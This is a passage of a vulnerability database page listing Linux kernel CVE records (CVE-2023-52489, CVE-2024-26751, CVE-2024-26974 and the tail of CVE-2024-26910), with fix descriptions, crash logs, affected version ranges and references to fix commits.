"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c7f2733e5011bfd136f1ca93497394d43aa76225"
},
{
"url": "https://git.kernel.org/stable/c/a24d5f2ac8ef702a58e55ec276aad29b4bd97e05"
},
{
"url": "https://git.kernel.org/stable/c/c2dc077d8f722a1c73a24e674f925602ee5ece49"
},
{
"url": "https://git.kernel.org/stable/c/653bc5e6d9995d7d5f497c665b321875a626161c"
},
{
"url": "https://git.kernel.org/stable/c/b93a6756a01f4fd2f329a39216f9824c56a66397"
},
{
"url": "https://git.kernel.org/stable/c/970709a67696b100a57b33af1a3d75fc34b747eb"
},
{
"url": "https://git.kernel.org/stable/c/97f7cf1cd80eeed3b7c808b7c12463295c751001"
}
],
"title": "netfilter: ipset: fix performance regression in swap operation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26910",
"datePublished": "2024-04-17T15:59:21.967Z",
"dateReserved": "2024-02-19T14:20:24.188Z",
"dateUpdated": "2025-05-04T12:55:08.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52489 (GCVE-0-2023-52489)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mm/sparsemem: fix race in accessing memory_section->usage
The below race is observed on a PFN which falls into the device memory
region with the system memory configuration where PFN's are such that
[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL]. Since normal zone start and end
pfn contains the device memory PFN's as well, the compaction triggered
will try on the device memory PFN's too though they end up in NOP(because
pfn_to_online_page() returns NULL for ZONE_DEVICE memory sections). When
from other core, the section mappings are being removed for the
ZONE_DEVICE region, that the PFN in question belongs to, on which
compaction is currently being operated is resulting into the kernel crash
with CONFIG_SPASEMEM_VMEMAP enabled. The crash logs can be seen at [1].
compact_zone() memunmap_pages
------------- ---------------
__pageblock_pfn_to_page
......
(a)pfn_valid():
valid_section()//return true
(b)__remove_pages()->
sparse_remove_section()->
section_deactivate():
[Free the array ms->usage and set
ms->usage = NULL]
pfn_section_valid()
[Access ms->usage which
is NULL]
NOTE: From the above it can be said that the race is reduced to between
the pfn_valid()/pfn_section_valid() and the section deactivate with
SPASEMEM_VMEMAP enabled.
The commit b943f045a9af("mm/sparse: fix kernel crash with
pfn_section_valid check") tried to address the same problem by clearing
the SECTION_HAS_MEM_MAP with the expectation of valid_section() returns
false thus ms->usage is not accessed.
Fix this issue by the below steps:
a) Clear SECTION_HAS_MEM_MAP before freeing the ->usage.
b) RCU protected read side critical section will either return NULL
when SECTION_HAS_MEM_MAP is cleared or can successfully access ->usage.
c) Free the ->usage with kfree_rcu() and set ms->usage = NULL. No
attempt will be made to access ->usage after this as the
SECTION_HAS_MEM_MAP is cleared thus valid_section() return false.
Thanks to David/Pavan for their inputs on this patch.
[1] https://lore.kernel.org/linux-mm/994410bb-89aa-d987-1f50-f514903c55aa@quicinc.com/
On Snapdragon SoC, with the mentioned memory configuration of PFN's as
[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL], we are able to see bunch of
issues daily while testing on a device farm.
For this particular issue below is the log. Though the below log is
not directly pointing to the pfn_section_valid(){ ms->usage;}, when we
loaded this dump on T32 lauterbach tool, it is pointing.
[ 540.578056] Unable to handle kernel NULL pointer dereference at
virtual address 0000000000000000
[ 540.578068] Mem abort info:
[ 540.578070] ESR = 0x0000000096000005
[ 540.578073] EC = 0x25: DABT (current EL), IL = 32 bits
[ 540.578077] SET = 0, FnV = 0
[ 540.578080] EA = 0, S1PTW = 0
[ 540.578082] FSC = 0x05: level 1 translation fault
[ 540.578085] Data abort info:
[ 540.578086] ISV = 0, ISS = 0x00000005
[ 540.578088] CM = 0, WnR = 0
[ 540.579431] pstate: 82400005 (Nzcv daif +PAN -UAO +TCO -DIT -SSBSBTYPE=--)
[ 540.579436] pc : __pageblock_pfn_to_page+0x6c/0x14c
[ 540.579454] lr : compact_zone+0x994/0x1058
[ 540.579460] sp : ffffffc03579b510
[ 540.579463] x29: ffffffc03579b510 x28: 0000000000235800 x27:000000000000000c
[ 540.579470] x26: 0000000000235c00 x25: 0000000000000068 x24:ffffffc03579b640
[ 540.579477] x23: 0000000000000001 x22: ffffffc03579b660 x21:0000000000000000
[ 540.579483] x20: 0000000000235bff x19: ffffffdebf7e3940 x18:ffffffdebf66d140
[ 540.579489] x17: 00000000739ba063 x16: 00000000739ba063 x15:00000000009f4bff
[ 540.579495] x14: 0000008000000000 x13: 0000000000000000 x12:0000000000000001
[ 540.579501] x11: 0000000000000000 x10: 0000000000000000 x9 :ffffff897d2cd440
[ 540.579507] x8 : 0000000000000000 x7 : 0000000000000000 x6 :ffffffc03579b5b4
[ 540.579512] x5 : 0000000000027f25 x4 : ffffffc03579b5b8 x3 :0000000000000
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 Version: f46edbd1b1516da1fb34c917775168d5df576f78 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52489",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-12T14:56:15.828991Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:22:46.560Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.387Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90ad17575d26874287271127d43ef3c2af876cea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b448de2459b6d62a53892487ab18b7d823ff0529"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68ed9e33324021e9d6b798e9db00ca3093d2012a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70064241f2229f7ba7b9599a98f68d9142e81a97"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a01daace71b521563c38bbbf874e14c3e58adb7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ec8e8ea8b7783fab150cf86404fc38cb4db8800"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/mmzone.h",
"mm/sparse.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "90ad17575d26874287271127d43ef3c2af876cea",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "b448de2459b6d62a53892487ab18b7d823ff0529",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "68ed9e33324021e9d6b798e9db00ca3093d2012a",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "70064241f2229f7ba7b9599a98f68d9142e81a97",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "3a01daace71b521563c38bbbf874e14c3e58adb7",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
},
{
"lessThan": "5ec8e8ea8b7783fab150cf86404fc38cb4db8800",
"status": "affected",
"version": "f46edbd1b1516da1fb34c917775168d5df576f78",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/mmzone.h",
"mm/sparse.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/sparsemem: fix race in accessing memory_section-\u003eusage\n\nThe below race is observed on a PFN which falls into the device memory\nregion with the system memory configuration where PFN\u0027s are such that\n[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL]. Since normal zone start and end\npfn contains the device memory PFN\u0027s as well, the compaction triggered\nwill try on the device memory PFN\u0027s too though they end up in NOP(because\npfn_to_online_page() returns NULL for ZONE_DEVICE memory sections). When\nfrom other core, the section mappings are being removed for the\nZONE_DEVICE region, that the PFN in question belongs to, on which\ncompaction is currently being operated is resulting into the kernel crash\nwith CONFIG_SPASEMEM_VMEMAP enabled. The crash logs can be seen at [1].\n\ncompact_zone()\t\t\tmemunmap_pages\n-------------\t\t\t---------------\n__pageblock_pfn_to_page\n ......\n (a)pfn_valid():\n valid_section()//return true\n\t\t\t (b)__remove_pages()-\u003e\n\t\t\t\t sparse_remove_section()-\u003e\n\t\t\t\t section_deactivate():\n\t\t\t\t [Free the array ms-\u003eusage and set\n\t\t\t\t ms-\u003eusage = NULL]\n pfn_section_valid()\n [Access ms-\u003eusage which\n is NULL]\n\nNOTE: From the above it can be said that the race is reduced to between\nthe pfn_valid()/pfn_section_valid() and the section deactivate with\nSPASEMEM_VMEMAP enabled.\n\nThe commit b943f045a9af(\"mm/sparse: fix kernel crash with\npfn_section_valid check\") tried to address the same problem by clearing\nthe SECTION_HAS_MEM_MAP with the expectation of valid_section() returns\nfalse thus ms-\u003eusage is not accessed.\n\nFix this issue by the below steps:\n\na) Clear SECTION_HAS_MEM_MAP before freeing the -\u003eusage.\n\nb) RCU protected read side critical section will either return NULL\n when SECTION_HAS_MEM_MAP is cleared or can successfully access -\u003eusage.\n\nc) Free the -\u003eusage with kfree_rcu() and set ms-\u003eusage = NULL. No\n attempt will be made to access -\u003eusage after this as the\n SECTION_HAS_MEM_MAP is cleared thus valid_section() return false.\n\nThanks to David/Pavan for their inputs on this patch.\n\n[1] https://lore.kernel.org/linux-mm/994410bb-89aa-d987-1f50-f514903c55aa@quicinc.com/\n\nOn Snapdragon SoC, with the mentioned memory configuration of PFN\u0027s as\n[ZONE_NORMAL ZONE_DEVICE ZONE_NORMAL], we are able to see bunch of\nissues daily while testing on a device farm.\n\nFor this particular issue below is the log. Though the below log is\nnot directly pointing to the pfn_section_valid(){ ms-\u003eusage;}, when we\nloaded this dump on T32 lauterbach tool, it is pointing.\n\n[ 540.578056] Unable to handle kernel NULL pointer dereference at\nvirtual address 0000000000000000\n[ 540.578068] Mem abort info:\n[ 540.578070] ESR = 0x0000000096000005\n[ 540.578073] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 540.578077] SET = 0, FnV = 0\n[ 540.578080] EA = 0, S1PTW = 0\n[ 540.578082] FSC = 0x05: level 1 translation fault\n[ 540.578085] Data abort info:\n[ 540.578086] ISV = 0, ISS = 0x00000005\n[ 540.578088] CM = 0, WnR = 0\n[ 540.579431] pstate: 82400005 (Nzcv daif +PAN -UAO +TCO -DIT -SSBSBTYPE=--)\n[ 540.579436] pc : __pageblock_pfn_to_page+0x6c/0x14c\n[ 540.579454] lr : compact_zone+0x994/0x1058\n[ 540.579460] sp : ffffffc03579b510\n[ 540.579463] x29: ffffffc03579b510 x28: 0000000000235800 x27:000000000000000c\n[ 540.579470] x26: 0000000000235c00 x25: 0000000000000068 x24:ffffffc03579b640\n[ 540.579477] x23: 0000000000000001 x22: ffffffc03579b660 x21:0000000000000000\n[ 540.579483] x20: 0000000000235bff x19: ffffffdebf7e3940 x18:ffffffdebf66d140\n[ 540.579489] x17: 00000000739ba063 x16: 00000000739ba063 x15:00000000009f4bff\n[ 540.579495] x14: 0000008000000000 x13: 0000000000000000 x12:0000000000000001\n[ 540.579501] x11: 0000000000000000 x10: 0000000000000000 x9 :ffffff897d2cd440\n[ 540.579507] x8 : 0000000000000000 x7 : 0000000000000000 x6 :ffffffc03579b5b4\n[ 540.579512] x5 : 0000000000027f25 x4 : ffffffc03579b5b8 x3 :0000000000000\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:51.825Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/90ad17575d26874287271127d43ef3c2af876cea"
},
{
"url": "https://git.kernel.org/stable/c/b448de2459b6d62a53892487ab18b7d823ff0529"
},
{
"url": "https://git.kernel.org/stable/c/68ed9e33324021e9d6b798e9db00ca3093d2012a"
},
{
"url": "https://git.kernel.org/stable/c/70064241f2229f7ba7b9599a98f68d9142e81a97"
},
{
"url": "https://git.kernel.org/stable/c/3a01daace71b521563c38bbbf874e14c3e58adb7"
},
{
"url": "https://git.kernel.org/stable/c/5ec8e8ea8b7783fab150cf86404fc38cb4db8800"
}
],
"title": "mm/sparsemem: fix race in accessing memory_section-\u003eusage",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52489",
"datePublished": "2024-02-29T15:52:08.718Z",
"dateReserved": "2024-02-20T12:30:33.302Z",
"dateUpdated": "2025-05-04T07:37:51.825Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26751 (GCVE-0-2024-26751)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ARM: ep93xx: Add terminator to gpiod_lookup_table
Without the terminator, if a con_id is passed to gpio_find() that
does not exist in the lookup table the function will not stop looping
correctly, and eventually cause an oops.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b2e63555592f81331c8da3afaa607d8cf83e8138 Version: b2e63555592f81331c8da3afaa607d8cf83e8138 Version: b2e63555592f81331c8da3afaa607d8cf83e8138 Version: b2e63555592f81331c8da3afaa607d8cf83e8138 Version: b2e63555592f81331c8da3afaa607d8cf83e8138 Version: b2e63555592f81331c8da3afaa607d8cf83e8138 Version: b2e63555592f81331c8da3afaa607d8cf83e8138 Version: b2e63555592f81331c8da3afaa607d8cf83e8138 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26751",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:36:01.250592Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:52.747Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.203Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9e200a06ae2abb321939693008290af32b33dd6e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/999a8bb70da2946336327b4480824d1691cae1fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70d92abbe29692a3de8697ae082c60f2d21ab482"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eec6cbbfa1e8d685cc245cfd5626d0715a127a48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/786f089086b505372fb3f4f008d57e7845fff0d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97ba7c1f9c0a2401e644760d857b2386aa895997"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6abe0895b63c20de06685c8544b908c7e413efa8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fdf87a0dc26d0550c60edc911cda42f9afec3557"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/arm/mach-ep93xx/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9e200a06ae2abb321939693008290af32b33dd6e",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
},
{
"lessThan": "999a8bb70da2946336327b4480824d1691cae1fa",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
},
{
"lessThan": "70d92abbe29692a3de8697ae082c60f2d21ab482",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
},
{
"lessThan": "eec6cbbfa1e8d685cc245cfd5626d0715a127a48",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
},
{
"lessThan": "786f089086b505372fb3f4f008d57e7845fff0d8",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
},
{
"lessThan": "97ba7c1f9c0a2401e644760d857b2386aa895997",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
},
{
"lessThan": "6abe0895b63c20de06685c8544b908c7e413efa8",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
},
{
"lessThan": "fdf87a0dc26d0550c60edc911cda42f9afec3557",
"status": "affected",
"version": "b2e63555592f81331c8da3afaa607d8cf83e8138",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/arm/mach-ep93xx/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nARM: ep93xx: Add terminator to gpiod_lookup_table\n\nWithout the terminator, if a con_id is passed to gpio_find() that\ndoes not exist in the lookup table the function will not stop looping\ncorrectly, and eventually cause an oops."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:40.678Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9e200a06ae2abb321939693008290af32b33dd6e"
},
{
"url": "https://git.kernel.org/stable/c/999a8bb70da2946336327b4480824d1691cae1fa"
},
{
"url": "https://git.kernel.org/stable/c/70d92abbe29692a3de8697ae082c60f2d21ab482"
},
{
"url": "https://git.kernel.org/stable/c/eec6cbbfa1e8d685cc245cfd5626d0715a127a48"
},
{
"url": "https://git.kernel.org/stable/c/786f089086b505372fb3f4f008d57e7845fff0d8"
},
{
"url": "https://git.kernel.org/stable/c/97ba7c1f9c0a2401e644760d857b2386aa895997"
},
{
"url": "https://git.kernel.org/stable/c/6abe0895b63c20de06685c8544b908c7e413efa8"
},
{
"url": "https://git.kernel.org/stable/c/fdf87a0dc26d0550c60edc911cda42f9afec3557"
}
],
"title": "ARM: ep93xx: Add terminator to gpiod_lookup_table",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26751",
"datePublished": "2024-04-03T17:00:36.523Z",
"dateReserved": "2024-02-19T14:20:24.169Z",
"dateUpdated": "2025-05-04T08:55:40.678Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26974 (GCVE-0-2024-26974)
Vulnerability from cvelistv5
Published
2024-05-01 05:20
Modified
2025-05-04 09:01
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: qat - resolve race condition during AER recovery
During the PCI AER system's error recovery process, the kernel driver
may encounter a race condition with freeing the reset_data structure's
memory. If the device restart will take more than 10 seconds the function
scheduling that restart will exit due to a timeout, and the reset_data
structure will be freed. However, this data structure is used for
completion notification after the restart is completed, which leads
to a UAF bug.
This results in a KFENCE bug notice.
BUG: KFENCE: use-after-free read in adf_device_reset_worker+0x38/0xa0 [intel_qat]
Use-after-free read at 0x00000000bc56fddf (in kfence-#142):
adf_device_reset_worker+0x38/0xa0 [intel_qat]
process_one_work+0x173/0x340
To resolve this race condition, the memory associated to the container
of the work_struct is freed on the worker if the timeout expired,
otherwise on the function that schedules the worker.
The timeout detection can be done by checking if the caller is
still waiting for completion or not by using completion_done() function.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d Version: d8cba25d2c68992a6e7c1d329b690a9ebe01167d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26974",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T17:47:45.425638Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:36.315Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.752Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/daba62d9eeddcc5b1081be7d348ca836c83c59d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e81cd58aee14a470891733181a47d123193ba81"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d03092550f526a79cf1ade7f0dfa74906f39eb71"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4ae5a97781ce7d6ecc9c7055396535815b64ca4f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/226fc408c5fcd23cc4186f05ea3a09a7a9aef2f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a5a7611ccc7b1fba8d933a9f22a2e76859d94dc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c2cf5142bfb634c0ef0a1a69cdf37950747d0be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bb279ead42263e9fb09480f02a4247b2c287d828"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d42e097607c4d246d99225bf2b195b6167a210c"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/crypto/intel/qat/qat_common/adf_aer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
